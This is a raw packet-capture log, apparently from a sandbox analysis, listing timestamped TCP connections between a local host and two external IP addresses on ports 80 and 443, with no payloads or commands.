Sep 4, 2024 17:37:09.456799030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456809044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456811905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456834078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456856012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457063913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457075119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457092047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457101107 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457102060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457115889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457122087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457125902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457137108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457139969 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457149029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457153082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457159996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457164049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457170963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457182884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457190037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457192898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457196951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457206011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457215071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457220078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457226038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457228899 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457237005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457251072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457253933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457262039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457273006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457274914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457289934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457295895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457514048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457525969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457536936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457550049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457560062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457560062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457571983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457582951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457606077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457617044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457626104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457648039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457668066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457813025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457823992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457833052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457843065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457849979 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457854033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457856894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457865953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457876921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457876921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457889080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457895041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457901001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457911968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457915068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457923889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457933903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.457933903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457942963 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.457971096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458182096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458192110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458200932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458211899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458218098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458223104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458230972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458234072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458245039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458254099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458256960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458261967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458287954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458337069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458349943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458359003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458369970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458375931 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458386898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458398104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458400965 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458408117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458417892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458420992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458430052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458431005 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458442926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458452940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458456039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458463907 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458472967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458477974 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458483934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458509922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458723068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458734989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458744049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458754063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458760977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458770037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458781958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.458784103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458803892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.458811045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.459141016 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.459162951 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.459197044 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.459204912 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.459222078 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.459230900 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.459240913 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.459264040 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.459286928 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.459291935 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.459316969 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.459322929 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.460305929 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.460321903 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.460362911 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.460369110 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.460391998 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.460402012 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.460431099 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.460448980 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.460477114 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.460489035 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.460500956 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.460522890 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.461709976 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.461725950 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.461733103 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.461738110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.461743116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.461745977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.461756945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.461766958 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.461767912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.461776972 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.461793900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.461810112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.461810112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.461812019 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.461812019 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.461833954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.462035894 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.462055922 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.462088108 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.462093115 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.462105989 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.462136030 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.463289976 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.463306904 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.463345051 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.463351965 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.463373899 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.463390112 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.463593960 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.463610888 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.463653088 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.463659048 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.463697910 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.464178085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464190006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464204073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464221001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464225054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464236975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464236975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464250088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464262009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464266062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464273930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464293003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464303017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464314938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464319944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464334965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464339972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464350939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464373112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464404106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464415073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464431047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464442015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464452982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464457035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464467049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464467049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464500904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464533091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464544058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464555025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464565992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464575052 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464577913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464590073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464600086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464639902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464658022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464668989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464679956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464690924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464690924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464703083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464720964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464741945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464785099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464797020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464827061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464854956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464855909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464873075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464883089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464903116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464903116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464914083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464915037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464926958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464937925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464945078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.464956999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.464972973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465006113 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465033054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465044022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465054035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465065002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465073109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465075970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465092897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465101004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465106964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465116978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465131044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465142965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465163946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465163946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465178013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465193987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465207100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465212107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465224981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465235949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465245962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465245962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465256929 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465256929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465274096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465291023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465372086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465387106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465404034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465415001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465420961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465431929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465441942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465447903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465454102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465461016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465466022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465476036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465480089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465503931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465543985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465553999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465564966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465575933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465588093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465595007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465600014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465610981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465612888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465625048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465636015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465650082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465675116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465725899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465737104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465745926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465758085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465769053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465770006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465786934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465799093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465799093 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465806007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465814114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465825081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465837002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465850115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465862036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465864897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465872049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465883970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465889931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465903997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465925932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465944052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465965986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465976954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.465986013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.465987921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466001034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466001987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466021061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466048002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466080904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466092110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466101885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466114998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466121912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466125965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466137886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466137886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466165066 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466175079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466202974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466244936 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.466379881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466389894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466401100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466411114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.466418028 CEST	49719	80	192.168.2.6	147.45.44.104
